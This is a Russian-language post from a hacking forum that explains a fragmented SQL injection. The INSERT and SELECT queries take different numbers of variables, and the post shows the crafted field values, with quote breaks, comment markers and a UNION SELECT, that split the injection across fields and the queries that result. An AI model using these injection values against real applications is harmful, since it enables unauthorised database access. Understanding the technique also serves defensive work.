
01.02.2010, 17:52
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме: 14023893
Репутация:
2163
|
|
если внимательно присмотрется в оба запроса, можно заметить, что в инсерте участвует на 1 переменную больше, что дает нам возможность реализовать фрагментированную sqli
было:
insert into DBinfo (user, text1, text2, text3 ) values ('$USER','$text1','$text2', '$text3')
select id from DBinfo where user='$USER' and text1='$text1' and text3='$text3'
задали:
$USER='or
$text1=or
$text2=,1,1,1)/*
$text3=union select xek/*
стало:
insert into DBinfo (user, text1, text2, text3 ) values (''or','or',',1,1,1)/*','union select xek/*')
select id from DBinfo where user=''or' and text1='or' and text3='union select xek/*'
и желательно в дальнейшем постить такие вопросы сюда
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|